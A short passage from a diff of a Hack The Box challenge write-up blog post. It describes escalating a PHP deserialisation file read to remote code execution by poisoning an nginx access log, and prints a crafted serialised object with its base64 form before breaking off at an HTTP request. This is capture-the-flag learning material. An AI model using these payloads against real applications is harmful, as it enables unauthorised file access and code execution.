Ha-L0/Ha-L0.github.io/_posts/2023-09-21-[H4]-HTB-Challenge-Toxic.md

 > It worked!
 {: .prompt-info }

-Now lets escalate this file read to a remote code execution by poisoning the `access.log` file.
+Now lets escalate this file read vulnerability to a remote code execution by poisoning the `access.log` file.
 From the `docker` image and the `http` response we know that `nginx` is used.
 The `access.log` location should be under: `/var/log/nginx/access.log`.

 Crafted serialised object: `O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}`

 `base64` encoded serialised object: `Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ==`
 ```http
 GET / HTTP/1.1